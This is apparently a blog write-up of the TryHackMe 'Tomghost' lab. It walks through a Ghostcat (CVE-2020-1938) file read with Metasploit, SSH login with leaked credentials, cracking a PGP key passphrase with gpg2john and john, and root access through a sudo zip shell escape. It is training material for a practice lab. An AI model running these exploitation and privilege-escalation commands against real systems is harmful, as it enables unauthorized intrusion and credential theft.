Post

TryHackMe - Tomghost

Getting the credentials using PGP key?

Posted
Preview Image
By René Bui
3 min read
TryHackMe - Tomghost

Introduction

Pretty solid room where I’ve learned a lot. Decrypting the pgp key using gpg2john and getting the user credentials this way + getting root using zip, very interesting.

Tryhackme Room Link

Nmap

Let’s start with nmap scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

nmap -T4 -n -sC -sV -Pn -p- 10.10.56.163
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we have 4 ports open 22/tcp 53/tcp 8009/tcp 8080/tcp

Reconnaisance

After a quick google search for Tomcat vulnerabilities we have come across the following: Vulnerabilities `CVE-2020-1938` and `CVE-2020-1745` have been reported in April 2020 for the Apache Tomcat AJP connector to suffer from a "Request Injection" (Ghostcat) type of attack

Initial Access

Let’s load metasploit for this

1

msfconsole

1
2
3
4
5
6
7
8
9
10
11
12

search cve: CVE-2020-1938
msf6 > search cve: CVE-2020-1938

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  auxiliary/admin/http/tomcat_ghostcat  2020-02-20       normal  Yes    Apache Tomcat AJP File Read


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/http/tomcat_ghostcat

Seems like we can use this module

1
2

use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) >

Now let’s see what options we need to set

1
2
3
4
5
6
7
8
9
10
11

msf6 auxiliary(admin/http/tomcat_ghostcat) > options

Module options (auxiliary/admin/http/tomcat_ghostcat):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   FILENAME  /WEB-INF/web.xml  yes       File name
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                         sing-metasploit.html
   RPORT     8009              yes       The Apache JServ Protocol (AJP) port (TCP)

So we just need to set the RHOSTS (Remote host IP) and run the exploit

1
2
3

msf6 auxiliary(admin/http/tomcat_ghostcat) > set RHOSTS 10.10.56.163
RHOSTS => 10.10.56.163
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit

1
2
3

     Welcome to GhostCat
        skyfuck:8730281lkjlkjdqlksalks
  </description>

These seem to be credentials so let’s try them to connect via ssh

1
2

ssh [email protected]
skyfuck@ubuntu:~$

User Flag

Ok we can actually get the user flag under the /home/merlin directory

User Flag

Root Flag

Now we can see 2 files

1
2

skyfuck@ubuntu:~$ ls
credential.pgp  tryhackme.asc

We need to get the credentials

1
2
3
4
5
6
7
8
9

skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: secret key imported
gpg: key C6707170: public key "tryhackme <[email protected]>" imported
gpg: key C6707170: "tryhackme <[email protected]>" not changed
gpg: Total number processed: 2
gpg:               imported: 1
gpg:              unchanged: 1
gpg:       secret keys read: 1
gpg:   secret keys imported: 1

1
2
3
4
5
6
7
8

skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <[email protected]>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
Enter passphrase:

We will need a passphrase for this

Let’s download the available files

1

scp [email protected]:/home/skyfuck/* /home/rene/Desktop/

And let’s use gpg2john to crack the tryhackme.asc file

1
2

gpg2john tryhackme.asc > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Passphrase

Now let’s use the passphrase to get the hash from the credential.pgp file

Passphrase

Now let’s use our new credentials to login as merlin

1
2

└─$ ssh [email protected]                                 
[email protected]'s password:

1
2
3
4
5
6

merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip

So we are now the new user and we can have root access to zip meaning we need to create a file and zip it

After quick google search we can use existing privilege escalation technique

1
2
3

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF

And we get a root flag

Root

TryHackMe
web linux privilege escalation
This post is licensed under CC BY 4.0 by the author.